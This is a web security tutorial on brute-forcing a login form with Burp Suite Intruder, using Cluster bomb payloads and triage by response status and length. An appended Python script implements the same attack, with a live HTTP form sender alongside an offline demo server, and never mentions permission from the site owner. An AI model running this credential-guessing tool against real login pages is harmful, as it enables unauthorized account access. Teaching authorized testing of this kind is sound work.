June 22, 2015
Launch a Web Application Bruteforce Using Burp Suite
Hello to all Cybrary Members. This is my process for launching a bruteforce (strictly, a dictionary) attack against a web application login page. Today, almost every web application defends itself with authentication, usually a login form. I'm going to show you how to run this attack using a simple proxy tool.

Requirements:
1. Burp Suite
2. Wordlists (search Google for username and password wordlists)
3. Common sense

Step 1: Ensure Burp Suite's proxy listener is running.
a. Open Burp Suite > Proxy tab > Options > Proxy Listeners section. You should see a table with "127.0.0.1:8080" in the Interface column. Make sure its Running checkbox is ticked.

Step 2: Browser configuration.
a. Open any browser and set its proxy to host 127.0.0.1 and port 8080 for both the HTTP and HTTPS protocols. For HTTPS targets you also need to import Burp's CA certificate into the browser, otherwise the browser rejects the intercepted TLS connection.

Step 3: Turn interception on.
a. In the Proxy tab, open the Intercept sub-tab and click the button so it reads "Intercept is on".

Step 4: Login page.
a. Go to the login page of the target site and type "test" into both the username and password fields. Press Enter to submit the form.

Step 5: Capture the request.
a. After hitting Enter, the POST request appears in the Intercept tab.
b. Right-click it.
c. Choose Send to Intruder.
Note: the Intruder tab is highlighted to show it received the request; you can navigate to that tab now. Forward or drop the intercepted request afterwards so the browser does not hang.

Step 6: Go to the Intruder tab (Positions sub-tab).
a. Clear the pre-set payload positions by clicking the Clear button on the right.
b. Highlight the username value and click Add, then do the same for the password value, so that exactly two payload positions are marked.
c. Change the attack type to Cluster bomb. Cluster bomb tries every combination of the two lists (usernames x passwords); if you only want to pair line 1 with line 1, line 2 with line 2, use Pitchfork instead. If the form carries an anti-CSRF token, a plain Cluster bomb attack will fail after the first request, and you need a Burp session handling rule or macro to refresh the token.

Step 7: Set the payloads for the username position.
a. Go to the Payloads sub-tab.
b. Set Payload set to "1" and Payload type to "Simple list".
c. In Payload options, load (or paste) the username wordlist.

Step 8: Set the payloads for the password position.
a. Change Payload set to "2" (type stays "Simple list").
b. In Payload options, load the password wordlist.

Step 9: Start the attack.
a. Click the Intruder menu at the top of the window.
b. Click Start attack. Keep the lists short on the free edition, which throttles Intruder, and remember that a long run against a live application can trigger account lockout.

Step 10: Find the result.
a. In the Intruder attack window, the results table lists every request with its Status and Length columns. Sort by either column: failed logins all share the same status code and response length, so the one row that differs (typically a 302 redirect to a logged-in page, or a response of a different size) is the candidate hit. If every row after a certain point changes at once, the account has probably been locked out rather than cracked.
b. Select that row and view the Response tab to see whether the server actually logged the user in.

Step 11: Confirm.
a. Confirm by logging in manually in the browser with the username and password that Burp Suite flagged.

Thanks!
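The same Cluster bomb attack and result analysis, written out in plain Python so the logic behind Steps 6 to 10 is visible. This is an added example, not part of the original post and not Burp Suite's own code. The login target is a constructed in-memory stand-in (`fake_login_server`) with an assumed valid credential pair, so the script runs offline; the wordlists are constructed and deliberately tiny; `http_form_sender` is an assumed helper showing how the same engine would POST to a real form, with made-up field names `username` and `password`.

```python
"""Cluster-bomb login attack with Intruder-style result triage (added example)."""
import itertools
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass
class Response:
    """The three things Burp's results table shows per request."""
    status: int
    length: int
    location: Optional[str]  # Location header, set on redirects


Sender = Callable[[str, str], Response]
Result = Tuple[str, str, Response]


def cluster_bomb(usernames: List[str], passwords: List[str], send: Sender) -> List[Result]:
    """Try every (username, password) pair, like Intruder's Cluster bomb attack type."""
    return [(u, p, send(u, p)) for u, p in itertools.product(usernames, passwords)]


def find_anomalies(results: List[Result]) -> List[Result]:
    """Step 10: failed logins share one (status, length); flag every row that differs.

    The most common (status, length) pair is treated as the "login failed" baseline,
    which is what sorting Burp's table by Status or Length lets you do by eye.
    """
    if not results:
        return []
    baseline = Counter((r.status, r.length) for _, _, r in results).most_common(1)[0][0]
    return [(u, p, r) for u, p, r in results if (r.status, r.length) != baseline]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: a redirect to a logged-in page is itself the signal."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_form_sender(url: str, user_field: str = "username",
                     pass_field: str = "password") -> Sender:
    """Real sender for a live form (assumed field names). Not exercised offline."""
    opener = urllib.request.build_opener(_NoRedirect())

    def send(user: str, pw: str) -> Response:
        body = urllib.parse.urlencode({user_field: user, pass_field: pw}).encode()
        req = urllib.request.Request(url, data=body, method="POST")
        try:
            with opener.open(req, timeout=10) as resp:
                return Response(resp.status, len(resp.read()), resp.headers.get("Location"))
        except urllib.error.HTTPError as e:  # 3xx and 4xx/5xx land here
            return Response(e.code, len(e.read()), e.headers.get("Location"))
    return send


# Constructed stand-in for the target login page so the script runs offline.
_VALID = {"admin": "Password1"}  # assumed credential, for the demo only
_FAIL_PAGE = b"<html><body>Invalid username or password</body></html>"


def fake_login_server(user: str, pw: str) -> Response:
    if _VALID.get(user) == pw:
        return Response(302, 0, "/dashboard")  # success: redirect, empty body
    return Response(200, len(_FAIL_PAGE), None)  # failure: same page every time


def run_demo() -> List[Result]:
    """Run the attack with constructed wordlists and return the flagged rows."""
    usernames = ["root", "test", "admin"]                   # constructed wordlist
    passwords = ["test", "123456", "letmein", "Password1"]  # constructed wordlist
    results = cluster_bomb(usernames, passwords, fake_login_server)
    return find_anomalies(results)


if __name__ == "__main__":
    for user, pw, resp in run_demo():
        print(f"candidate: {user}:{pw} -> {resp.status} {resp.location}")
```

Swapping `fake_login_server` for `http_form_sender("https://target.example/login")` turns this into a live attack; note that, like Intruder, it sends no cookies or CSRF tokens, so forms that require them need session handling on top of this.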